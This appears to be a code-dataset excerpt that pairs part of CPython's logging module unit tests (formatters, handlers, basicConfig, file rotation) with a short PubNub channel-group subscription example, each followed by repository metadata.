ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_stderr = sys.stderr
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
sys.stderr = sio = io.StringIO()
root.debug('This should not appear')
self.assertEqual(sio.getvalue(), '')
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'This is your final chance!\n')
#No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'No handlers could be found for logger "root"\n')
# 'No handlers' message only printed once
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
root.manager.emittedNoHandlerWarning = False
#If raiseExceptions is False, no message is printed
logging.raiseExceptions = False
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
finally:
sys.stderr = old_stderr
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', IOError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', IOError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', IOError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
def _test_log(self, method, level=None):
called = []
patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
if threading:
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.level = self.original_logging_level
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_filename(self):
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.addCleanup(expected.close)
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
def test_filemode(self):
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.addCleanup(expected.close)
self.assertEqual(handler.stream.mode, expected.stream.mode)
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
old_raise = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExecptions', old_raise)
logging.raiseExceptions = True
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
old_raise = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExecptions', old_raise)
logging.raiseExceptions = False
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
#print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
h = logging.handlers.NTEventLogHandler('test_logging')
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertTrue(num_recs < win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, HandlerTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, DatagramHandlerTest,
MemoryTest, EncodingTest, WarningsTest, ConfigDictTest,
ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest,
BasicConfigTest, LoggerAdapterTest, LoggerTest,
SMTPHandlerTest, FileHandlerTest, RotatingFileHandlerTest,
LastResortTest, LogRecordTest, ExceptionTest,
SysLogHandlerTest, HTTPHandlerTest, NTEventLogHandlerTest,
TimedRotatingFileHandlerTest
)
if __name__ == "__main__":
test_main()
|
MalloyPower/parsing-python
|
front-end/testsuite-python-lib/Python-3.3.0/Lib/test/test_logging.py
|
Python
|
mit
| 134,314
|
## www.pubnub.com - PubNub Real-time push service in the cloud.
# coding=utf8
## PubNub Real-time Push APIs and Notifications Framework
## Copyright (c) 2010 Stephen Blum
## http://www.pubnub.com/
import sys
from pubnub import Pubnub as Pubnub
publish_key = len(sys.argv) > 1 and sys.argv[1] or 'demo'
subscribe_key = len(sys.argv) > 2 and sys.argv[2] or 'demo'
secret_key = len(sys.argv) > 3 and sys.argv[3] or 'demo'
cipher_key = len(sys.argv) > 4 and sys.argv[4] or 'abcd'
ssl_on = len(sys.argv) > 5 and bool(sys.argv[5]) or False
## -----------------------------------------------------------------------
## Initiate Pubnub State
## -----------------------------------------------------------------------
pubnub = Pubnub(publish_key=publish_key, subscribe_key=subscribe_key,
secret_key=secret_key, cipher_key=cipher_key, ssl_on=ssl_on)
channel = 'ab'
# Asynchronous usage
def callback_abc(message, channel, real_channel):
print(str(message) + ' , ' + channel + ', ' + real_channel)
pubnub.unsubscribe_group(channel_group='abc')
#pubnub.stop()
def callback_d(message, channel):
print(str(message) + ' , ' + channel)
def error(message):
print("ERROR : " + str(message))
def connect_abc(message):
print("CONNECTED " + str(message))
def connect_d(message):
print("CONNECTED " + str(message))
pubnub.unsubscribe(channel='d')
def reconnect(message):
print("RECONNECTED " + str(message))
def disconnect(message):
print("DISCONNECTED " + str(message))
print pubnub.channel_group_add_channel(channel_group='abc', channel="b")
pubnub.subscribe_group(channel_groups='abc', callback=callback_abc, error=error,
connect=connect_abc, reconnect=reconnect, disconnect=disconnect)
pubnub.subscribe(channels='d', callback=callback_d, error=error,
connect=connect_d, reconnect=reconnect, disconnect=disconnect)
pubnub.start()
|
teddywing/pubnub-python
|
python/examples/subscribe_group.py
|
Python
|
mit
| 1,925
|
# -*- coding: utf-8 -*-
{
